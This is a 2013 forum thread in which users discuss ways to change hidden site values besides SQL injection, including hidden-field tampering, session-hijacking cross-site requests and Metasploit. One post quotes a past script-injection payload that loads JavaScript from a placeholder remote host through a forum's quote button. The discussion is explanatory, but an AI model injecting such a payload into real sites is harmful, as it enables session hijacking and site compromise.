Changing values besides SQL Injection

Started by frosty, December 27, 2013, 03:35:24 AM

Previous topic - Next topic

frosty

I know that SQL Injection is a good way to hack into a server and change what you want, steal what you want, or even crash the database, but I remember reading a thread on Mozilla forums where the posters agreed in conclusion that there are other methods, besides SQL injection, that you can change certain values hidden from the average users. Considering, they said, that certain values such as post count, join date, etc are simply accepted number values in a system, with the right methods the user could change such values to their liking.

Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection? Because that would mean that hacking in some cases is not required for someone to change certain hidden values they want changed. And would it even be legal to do so anyways? Editing the source code only changes things on your end for a short time.

Plu

It all depends on how the website is set up. If your server accepts a form that includes the post count, which is a 'hidden' field and you rely on the user to properly update it, then he can simply post a different value and change it like that. It's perfectly legal to do so, and dumb on the side of the programmer to use that approach.

It's also possible to use cross-site hacks that post a form as another user by hijacking their user session. That's not legal, but if a site is vulnerable to it and you get such a script to run on the machine of an admin, you could change just about anything because the server will interpret the requests as coming from the admin.

Of course both of these can be blocked off with good software design.

EDIT: and of course there are many more options, depending on the setup of the site. But all of them rely on the programmer making a mistake somewhere.

bericks999

Take a look at the Metasploit tool to learn exactly what you are asking about.  It's an open source penetration testing framework therefore entirely free to download and use.

http://www.metasploit.com/
... I swear, one day religion is going to physically poison me to death.

Sal1981

Unescape, unescape, unescape.

Data sanitation is very important in online forms, especially forum posts.

For instance, on RuneScape's official forums there was an oversight of the quote button, where you could hide JavaScript as regular text by just typing:',0);followed by any inline tag, even something as',0);<script src='remotesite/malicious_code.js'></script>would load whatever would be on the remote js on the browsers client. What really annoyed me in this particular case is that JaGeX took a whole 2 weeks to patch this, even though loads of people knew on it on the HLF section of the forums. I even saw throw-away accounts post tiny fontsized text with this text with links to external script files hidden among regular text, hoping people would click on the quote button. It is patched now, at last.

Jason78

Quote from: "frosty"Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes.  Yes there is.  It's still compromising a computer system though, and still technically illegal.
Winner of WitchSabrinas Best Advice Award 2012


We can easily forgive a child who is afraid of the dark; the real
tragedy of life is when men are afraid of the light. -Plato

bericks999

Quote from: "Jason78"
Quote from: "frosty"Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes.  Yes there is.  It's still compromising a computer system though, and still technically illegal.
That's not true as I've legally compromised many systems as part of a penetration testing team.
... I swear, one day religion is going to physically poison me to death.

Plu

I also doubt the defense "but they're not allowed" will hold if your machine openly accepts any value for a variable.

aitm

If anybody wants some practice hacking I have a site that I would pay a couple hundred to get hacked/fucked up/destroyed etc.......PM me.
A humans desire to live is exceeded only by their willingness to die for another. Even god cannot equal this magnificent sacrifice. No god has the right to judge them.-first tenant of the Panotheust

Jason78

Quote from: "bericks999"
Quote from: "Jason78"
Quote from: "frosty"Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes.  Yes there is.  It's still compromising a computer system though, and still technically illegal.
That's not true as I've legally compromised many systems as part of a penetration testing team.

Yeah, but I'm guessing that Frosty doesn't own the site he's thinking of hacking.
Winner of WitchSabrinas Best Advice Award 2012


We can easily forgive a child who is afraid of the dark; the real
tragedy of life is when men are afraid of the light. -Plato

frosty

Quote from: "aitm"If anybody wants some practice hacking I have a site that I would pay a couple hundred to get hacked/fucked up/destroyed etc.......PM me.

I remember a guy that did that for fun, he was so skilled at this type of stuff it was amazing. But unfortunately he was as elusive as he was good at hacking, and he disappeared as far as I'm concerned. He probably would have been the best person for that type of job.

Quote from: "Jason78"Yeah, but I'm guessing that Frosty doesn't own the site he's thinking of hacking.

Oh wow Jason I was curious, I did not want to make an account on Mozilla forums so I thought I would ask here.